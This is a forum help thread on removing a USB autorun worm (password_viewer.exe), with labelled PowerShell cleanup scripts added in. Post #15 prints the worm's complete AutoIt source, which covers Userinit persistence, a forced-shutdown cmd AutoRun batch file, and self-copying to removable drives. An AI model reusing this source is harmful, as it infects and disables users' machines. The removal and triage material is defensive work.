
Need Help. How To Remove Password_viewer.exe And Autorun.inf :(


This topic is locked
17 replies to this topic

#1 Ezzac EMZ

Posted 30 December 2007 - 12:27 AM

Hi guys, can anyone tell me how to completely remove files named password_viewer.exe and autorun.inf from my 1G DV MMC? Is it a virus? I don't know where I got those files, but I think they came from one of my customers' MMCs, and now they have already affected all my MMCs and pendrives. The PC can't detect these files, but a mobile phone can. Help me please.


#2 quietman7

Posted 30 December 2007 - 01:02 AM

Reboot your computer in "Safe Mode" or "Safe Mode With Command Prompt" using the F8 method. To do this, restart your computer and after hearing your computer beep once during startup (but before the Windows icon appears) press the F8 key repeatedly. A menu will appear with several options. Use the arrow keys to navigate and select the option to run Windows in "Safe Mode With Command Prompt".

Go to Start > Run and type: cmd
  • press Ok.
  • At the command prompt, type in your primary drive location, usually C:
  • You may need to change the directory. If so type: cd \
  • Hit Enter.
  • Type: attrib -s -h -r -a autorun.inf
  • Hit Enter.
  • Type: dir
  • Hit Enter. This will allow you to see and confirm the Autorun files.
  • Type: del autorun.inf
  • Hit Enter.
  • Repeat the above commands for each drive on your computer.
Now search for and remove password_viewer.exe
  • At the command prompt, type in your primary drive location, usually C:
  • Type: dir /s password_viewer.exe
  • Hit Enter.
  • If the file is present, type: del password_viewer.exe
  • Hit Enter.
  • Repeat the above commands for each drive on your computer.
  • Exit the command prompt and reboot normally.

.
.
Windows Insider MVP 2017-2018
Microsoft MVP Reconnect 2016
Microsoft MVP Consumer Security 2007-2015 kO7xOZh.gif
Member of UNITE, Unified Network of Instructors and Trusted Eliminators

If I have been helpful & you'd like to consider a donation, click 38WxTfO.gif
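The same attrib / dir / del procedure, done for every mounted drive at once, as an added PowerShell example (this is not quietman7's script; he gave manual cmd.exe steps). It reports by default and only deletes when run with -Remove; the file names come from the thread, and the -Remove switch and the report format are this example's own.

```powershell
# Added example, not from the thread: the attrib/dir/del steps above done for
# every mounted drive from PowerShell. By default it only reports; pass -Remove
# to delete what it finds. Run from an elevated prompt.
param([switch]$Remove)

$dropper = 'password_viewer.exe'   # file name reported in the thread

foreach ($drive in Get-PSDrive -PSProvider FileSystem) {
    $root = $drive.Root

    # --- autorun.inf at the drive root ---
    $inf = Join-Path $root 'autorun.inf'
    if (Test-Path -LiteralPath $inf) {
        $item = Get-Item -LiteralPath $inf -Force            # -Force shows hidden/system files
        Write-Host ("{0}  attributes: {1}" -f $inf, $item.Attributes)

        # Print the lines that decide what Explorer launches on double-click, so the
        # executable referenced by the file can be located and removed as well.
        Get-Content -LiteralPath $inf |
            Where-Object { $_ -match '^\s*(open|shellexecute|shell\\[^=]*\\command)\s*=' } |
            ForEach-Object { Write-Host "    $_" }

        if ($Remove) {
            $item.Attributes = 'Normal'                      # attrib -s -h -r -a autorun.inf
            Remove-Item -LiteralPath $inf -Force             # del autorun.inf
            Write-Host "    deleted"
        }
    }

    # --- dir /s password_viewer.exe ---
    Get-ChildItem -LiteralPath $root -Filter $dropper -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            Write-Host ("{0}  {1} bytes  attributes: {2}" -f $_.FullName, $_.Length, $_.Attributes)
            if ($Remove) {
                $_.Attributes = 'Normal'                     # clear read-only/system/hidden first
                Remove-Item -LiteralPath $_.FullName -Force
                Write-Host "    deleted"
            }
        }
}
```

Run it once without -Remove and read the "open=" and "shell\...\command=" lines it prints: they name the executable the autorun.inf launches, which is the file to look for next. If the dropper is still running it will recreate what you delete, so end its process in Task Manager before running with -Remove.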

#3 Ezzac EMZ

Posted 30 December 2007 - 01:53 AM

I can't solve it yet...
When I go to Start > Run and type: cmd, my PC shuts down after a few seconds... What should I do?

#4 quietman7

Posted 30 December 2007 - 08:14 AM

Is this happening in safe mode too?

If your system keeps shutting down, follow these steps to stop the cycle:
  • Click on Start > Run and type: cmd
  • Press Enter.
  • At the Command Prompt type: shutdown -a
  • Press Enter.


#5 Ezzac EMZ

Posted 30 December 2007 - 09:16 AM

I can't reach safe mode... :thumbsup: After pressing F8 before the Windows icon appears, only this menu appears:

please select boot device

PM -WDC....
SH -HL -DT -ST DVDRAM.....
SS -AOPEN....
VIA BOOTAGENT


What should I select?

And I also can't use Start > Run > cmd > Enter... my PC shuts down after that...

#6 quietman7

Posted 30 December 2007 - 10:21 AM

In Windows XP, the default setting is for the computer to reboot automatically when a fatal error or crash occurs. You should be able to see the error by looking in the Event Log. Read "How To Use the Event Viewer Applet". You can then gather more information doing a search of the Event ID number at:
"EventID.Net".
"Windows Security Log Events".
"Events and Errors Message Center".

An alternative is to turn off the automatic reboot feature so you can actually see the error code/STOP Message when it happens - this is also known as the Blue Screen Of Death (BSOD).

To change the recovery settings and Disable Automatic Rebooting, go to Start > Run and type: sysdm.cpl
Click Ok or just press WINKEY + Pause/Break keys to bring up System Properties.
  • Go to the Advanced tab and under "Startup and Recovery", click on the "Settings" button and go to "System failure".
  • Make sure "Write an event to the system log" is checked and that "Automatically restart" is UNchecked.
  • Click "OK" and reboot for the changes to take effect.
Doing this won't cure your problem but instead of crashing and restarting you will get a blue diagnostic screen with an error code and other information that will allow you to better trace your problem.
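The registry equivalent of the "Automatically restart" and "Write an event to the system log" checkboxes, followed by a System log query for the events that explain a shutdown, as an added PowerShell example (not part of quietman7's instructions). The CrashControl values and the three event IDs are standard Windows ones; the query depth of 2000 entries is an arbitrary choice of this example.

```powershell
# Added example, not from the thread: Startup and Recovery settings via the
# registry, then the System log entries that say why the machine went down.
# Run from an elevated prompt.

$crash = 'HKLM:\SYSTEM\CurrentControlSet\Control\CrashControl'
$current = (Get-ItemProperty -Path $crash).AutoReboot
Write-Host "AutoReboot is currently $current (1 = restart on a STOP error, 0 = leave the blue screen up)"

Set-ItemProperty -Path $crash -Name AutoReboot -Value 0 -Type DWord   # uncheck "Automatically restart"
Set-ItemProperty -Path $crash -Name LogEvent   -Value 1 -Type DWord   # check "Write an event to the system log"

# Shutdown-related System log entries, newest first:
#   1074 (USER32)    a process asked Windows to shut down; the message names the process
#   6008 (EventLog)  the previous shutdown was unexpected (power loss, crash, hard reset)
#   1001 (Save Dump) a STOP error was recorded, with its bugcheck code
Get-EventLog -LogName System -Newest 2000 |
    Where-Object { 1074, 6008, 1001 -contains $_.EventID } |
    Select-Object TimeGenerated, EventID, Source, Message |
    Format-List
```

Event 1074 is the one to read first: a crash produces 6008 or 1001, whereas a deliberate shutdown command produces 1074 with the name of the process that requested it, which tells you whether you are chasing a driver fault or something that runs shutdown.exe.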

#7 Ezzac EMZ

Posted 30 December 2007 - 10:58 AM

I have already reached the Safe Mode with Command Prompt menu, but when I click on either the admin or user profile... my PC shuts down after that... :thumbsup: What should I do now... help me... When I try using safe mode, a box with the words "password:winzip123" appears... What's that? I think that's the main problem...

Edited by Ezzac EMZ, 30 December 2007 - 11:24 AM.


#8 quietman7

Posted 30 December 2007 - 01:19 PM

I suspect the message means that the malware has password protected safe mode and is causing the machine to shut down when trying to use cmd.

Let's try doing this manually.

Reconfigure Windows XP to show hidden files, folders. Open My Computer, go to Tools > Folder Options and click on the View tab. Under Hidden Files and Folders, check "Show hidden files and Folders", uncheck "Hide Protected operating system Files (recommended)", uncheck "Hide file extensions for known file types", and hit Apply > OK.

Open My Computer, right-click on your primary drive (DO NOT double-click), select "Explore", and search for any autorun.inf at the root, then delete it. Repeat the search on all your drives and delete any autorun.inf files you find.

Use Windows Search feature > More advanced options to search for password_viewer.exe. To do this, go to Start -> Search and click For Files or Folders....
  • Click All files and folders.
  • Type in the name of the file under "Search by...criteria."
  • Click More advanced options and check these options:
    • "Search system folders"
    • "Search hidden files and folders"
    • "Search subfolders"
  • Then click "Search" to look for the file(s).
When found right-click the file, choose delete and empty your recycle bin. If you get an error when deleting a file, right-click on it and check to see if the read only attribute is checked. If it is, uncheck it and try again. If that does not work, then open Task Manager, look for and kill the process if running, then delete the file.

If you cannot delete the file, please let me know the exact location (full file path) it is running from.

#9 Ezzac EMZ

Posted 30 December 2007 - 01:56 PM

I have already followed your guide to use the Windows Search feature:
  • Click All files and folders.
  • Type in the name of the file under "Search by...criteria."
  • Click More advanced options and check these options:
    • "Search system folders"
    • "Search hidden files and folders"
    • "Search subfolders"
  • Then click "Search" to look for the file(s).

Then I found one file named password_viewer.exe (227kb) in C:\Windows
and one in the Prefetch folder... already deleted both files.

And found one process in Windows Task Manager, already killed it. I will post the result after this step.

:thumbsup:... it's still there in C:\Windows and when I double click on it... my Spybot continuously fights with it. In Windows Task Manager that process also appears again.

Edited by Ezzac EMZ, 30 December 2007 - 02:10 PM.


#10 quietman7

Posted 30 December 2007 - 05:17 PM

Please download OTMoveIt by OldTimer and save to your Desktop.
  • Double-click on OTMoveIt.exe to launch the program.
  • Copy the file(s)/folder(s) paths listed below - highlight everything in the quote box and press CTRL+C or right-click and choose Copy.

C:\Windows\password_viewer.exe

  • Then in OTMoveIt, right-click in the open text box labeled "Paste List of Files/Folders to be Moved" and choose Paste.
  • Click the red MoveIt! button.
  • The list will be processed and the results for each line will be displayed in the right-hand pane.
  • Highlight everything in the Results window, press CTRL+C or right-click, choose Copy, right-click again and Paste it in your next reply.
  • Click Exit when done.
  • A log of the results is automatically created and saved to C:\_OTMoveIt\MovedFiles\mmddyyyy_hhmmss.log <- the date/time the tool was run.
  • Please copy/paste the contents of that log in your next reply.
-- Note: If a file or folder cannot be moved immediately you may be asked to reboot your computer in order to finish the move process.
If asked to reboot, choose Yes.


Caution: Be careful of what you copy and paste with this tool. OTMoveIt is a powerful program, designed to move highly persistent files and folders. Not following the directions as instructed or using incorrectly could lead to disastrous problems with your operating system.



#11 Ezzac EMZ

Posted 31 December 2007 - 04:08 AM

Should I check or uncheck the Unregister Dll's and Ocx's box?

Here is the result...

File/Folder C:\Windows\password_viewer.exe not found.

Created on 12-31-2007 17:34:02

But when I try to use Start > Run > cmd... my PC shuts down again. I'm also facing the same problem when I reboot and use safe mode under the admin account. If I use another user account, I still can't get access to Start > Run > cmd. The PC shuts down after a second... :thumbsup:

Edited by Ezzac EMZ, 31 December 2007 - 04:37 AM.


#12 quietman7

Posted 31 December 2007 - 09:51 AM

Please read and follow all instructions in the pinned topic titled "Preparation Guide For Use Before Posting A Hijackthis Log". You may have performed some of these steps already. If you can't perform a step, then skip and continue with the next. In step #9 there are instructions for downloading HijackThis and creating a log. (This is a self-extracting version which will automatically install the current version of HJT in the proper location.) If using Windows Vista, be sure to Run As Administrator.

When you have done that, post your log in the HijackThis Logs and Malware Removal forum, NOT here, for assistance by the HJT Team Experts. A member of the Team will walk you through, step by step, on how to clean your computer. If you post your log back in this thread, the response from the HJT Team will be delayed because your post will have to be moved. This means it will fall in line behind any others posted that same day.

Start a new topic, give it a relevant title and post your log along with a brief description of your problem, a summary of any anti-malware tools you have used and a summary of any steps that you have performed on your own. Please include the top portion of the HijackThis log that lists version information. An expert will analyze your log and reply with instructions advising you what to fix. After doing this, we would appreciate it if you post a link to your log back here so we know that you're getting help from the HJT Team.

Please be patient. It may take a while to get a response because the HJT Team members are very busy working logs posted before yours. They are volunteers who will help you out as soon as possible. Once you have made your post and are waiting, please DO NOT "bump" your post or make another reply until it has been responded to by a member of the HJT Team. Generally the staff checks the forum for postings that have 0 replies as this makes it easier for them to identify those who have not been helped. If you post another response there will be 1 reply. A team member, looking for a new log to work may assume another HJT Team member is already assisting you and not open the thread to respond.

#13 Ezzac EMZ

Posted 31 December 2007 - 10:38 AM

Thanks quietman7, should I copy the logs and paste them in the thread?

#14 quietman7

Posted 31 December 2007 - 10:41 AM

Yes, go to the HijackThis Logs & Malware Removal forum, start a new topic and paste your log there.

#15 Ezzac EMZ

Posted 31 December 2007 - 11:00 AM

quietman7, when trying to find a solution using Google... this is what I found... I am not sure what the script is for, but maybe you know.


#NoTrayIcon
Const $INF="Autorun.inf", $EXE_FILE=@ScriptName, $BAT_FILE="pc-off.bat", $MAIL="lampangbano@gmail.com"
Const $INF_VALUE="[autorun]"&@CRLF&"open="""&$EXE_FILE&" %1"""&@CRLF&"shell\Open\command="""& _
$EXE_FILE&" %1"""&@CRLF&"shell\Explore\command="""&$EXE_FILE&" %1"""&@CRLF

If $CmdLine[0] Then Run(@WindowsDir&"\explorer.exe "&$CmdLine[1])
$regValue=RegRead("HKCU\Software\BARRY","")
If $regValue<>$MAIL Then
MsgBox(4096+64,"Thank you!!!","Password: winzip123")
main()
Exit
Else
While 1
main()
Sleep(500)
WEnd
EndIf

Func main()
$ss=@WindowsDir&"\"&$EXE_FILE
$sh=@WindowsDir&"\"&$BAT_FILE
$winlogon="HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
$explorer="HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced"
RegWrite($winlogon,"Userinit","REG_SZ","userinit.exe,"&@ScriptName)
RegWrite($explorer,"HideFileExt","REG_DWORD",1)
RegWrite($explorer,"Hidden","REG_DWORD",2)
RegWrite($explorer,"ShowSuperHidden","REG_DWORD",0)
RegWrite("HKCU\Software\Microsoft\Command Processor","autorun","REG_SZ",$sh)
RegWrite("HKCU\Software\BARRY","","REG_SZ",$MAIL)
If Not FileExists($ss) Then
FileCopy(@ScriptFullPath,$ss)
FileSetAttrib($ss,"+RSH")
EndIf
If Not FileExists($sh) Then
$batfile=FileOpen($sh,2)
FileWrite($batfile,"@echo off"&@CRLF&"shutdown -s -f -t 1")
FileClose($batfile)
FileSetAttrib($sh,"+RSH")
EndIf
$thumb_drive=DriveGetDrive("REMOVABLE")
If Not @error Then
For $i=1 to $thumb_drive[0]
If ($thumb_drive[$i]<>"a:" And $thumb_drive[$i]<>"b:") And DriveStatus($thumb_drive[$i])="READY" Then
$tdpath=$thumb_drive[$i]&"\"&$INF
If FileExists($tdpath) Then
$autorun=FileOpen($tdpath,0)
$value=""
While 1
$value&=FileReadLine($autorun)&@CRLF
If @error=-1 Then ExitLoop
WEnd
FileClose($autorun)
If(StringInStr($value,$EXE_FILE))=0 Then
FileSetAttrib($tdpath,"-RSH")
writeAutorun($tdpath)
EndIf
Else
writeAutorun($tdpath)
EndIf
$ss=$thumb_drive[$i]&"\"&$EXE_FILE
If Not FileExists($ss) Then
FileCopy(@ScriptFullPath,$ss)
FileSetAttrib($ss,"+RSH")
EndIf
EndIf
Next
EndIf
EndFunc

Func writeAutorun($path)
$autorun=FileOpen($path,2)
FileWrite($autorun,$INF_VALUE)
FileClose($autorun)
FileSetAttrib($path,"+RSH")
EndFunc
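The source posted above explains several symptoms in this thread: it sets the Command Processor "autorun" value to pc-off.bat, which runs "shutdown -s -f -t 1" every time cmd.exe starts; it appends itself to the Winlogon Userinit value so it runs at every logon; it sets the Explorer Hidden / ShowSuperHidden / HideFileExt values so the files stay invisible (which is why quietman7's post #8 has you change Folder Options); and it writes an autorun.inf plus a copy of itself to every removable drive. The script below is an added triage example (not from the thread) that checks each of those persistence points and, with -Restore, puts them back to Windows defaults. The key and file names come from the posted source; the -Restore switch, the Report helper and the default Userinit value ("%SystemRoot%\system32\userinit.exe,") are this example's own.

```powershell
# Added example, not from the thread: check the persistence points visible in
# the posted source and optionally restore Windows defaults. Run elevated.
param([switch]$Restore)

$findings = @()
function Report($what, $value, $bad) {
    $script:findings += [pscustomobject]@{ Check = $what; Value = $value; Suspicious = $bad }
}

# 1. Winlogon Userinit: the source appends its own name after "userinit.exe,"
$winlogon = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon'
$userinit = (Get-ItemProperty $winlogon).Userinit
Report 'Winlogon\Userinit' $userinit ($userinit -notmatch '^[^,]*userinit\.exe,?\s*$')

# 2. Command Processor AutoRun: a command executed every time cmd.exe starts.
#    The source points it at pc-off.bat ("shutdown -s -f -t 1"), hence the
#    power-off a few seconds after Start > Run > cmd.
$cmdproc = 'HKCU:\Software\Microsoft\Command Processor'
$autorun = (Get-ItemProperty $cmdproc -ErrorAction SilentlyContinue).AutoRun
Report 'Command Processor\AutoRun' $autorun (-not [string]::IsNullOrEmpty($autorun))

# 3. Explorer view settings the source forces (Hidden=2, ShowSuperHidden=0,
#    HideFileExt=1); the "show" values are 1, 1 and 0.
$adv  = 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced'
$view = Get-ItemProperty $adv
Report 'Explorer Hidden'          $view.Hidden          ($view.Hidden -ne 1)
Report 'Explorer ShowSuperHidden' $view.ShowSuperHidden ($view.ShowSuperHidden -ne 1)
Report 'Explorer HideFileExt'     $view.HideFileExt     ($view.HideFileExt -ne 0)

# 4. Infection marker and dropped files, names taken from the source
$marker = Test-Path 'HKCU:\Software\BARRY'
Report 'HKCU\Software\BARRY' $marker $marker
foreach ($f in 'password_viewer.exe', 'pc-off.bat') {
    $p = Join-Path $env:SystemRoot $f
    $exists = Test-Path -LiteralPath $p
    Report "File $p" $exists $exists
}

$findings | Format-Table -AutoSize

if ($Restore) {
    # The source re-applies every value each 500 ms while running, so stop it first.
    Stop-Process -Name 'password_viewer' -Force -ErrorAction SilentlyContinue

    Set-ItemProperty $winlogon -Name Userinit -Value "$env:SystemRoot\system32\userinit.exe,"
    Remove-ItemProperty $cmdproc -Name AutoRun -ErrorAction SilentlyContinue
    Set-ItemProperty $adv -Name Hidden          -Value 1 -Type DWord
    Set-ItemProperty $adv -Name ShowSuperHidden -Value 1 -Type DWord
    Set-ItemProperty $adv -Name HideFileExt     -Value 0 -Type DWord
    Remove-Item 'HKCU:\Software\BARRY' -Recurse -ErrorAction SilentlyContinue

    foreach ($f in 'password_viewer.exe', 'pc-off.bat') {
        $p = Join-Path $env:SystemRoot $f
        if (Test-Path -LiteralPath $p) {
            (Get-Item -LiteralPath $p -Force).Attributes = 'Normal'   # clear the +RSH the source sets
            Remove-Item -LiteralPath $p -Force
        }
    }
}
```

Run it without -Restore first and look at the Suspicious column; a non-empty Command Processor AutoRun and a Userinit value with a second entry after the comma are the two findings that match this thread. Because the Explorer values and the marker live under HKCU, repeat the check under each user account that has logged on, and clean every removable drive that was plugged into the machine, since the source copies itself and a fresh autorun.inf to each one.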

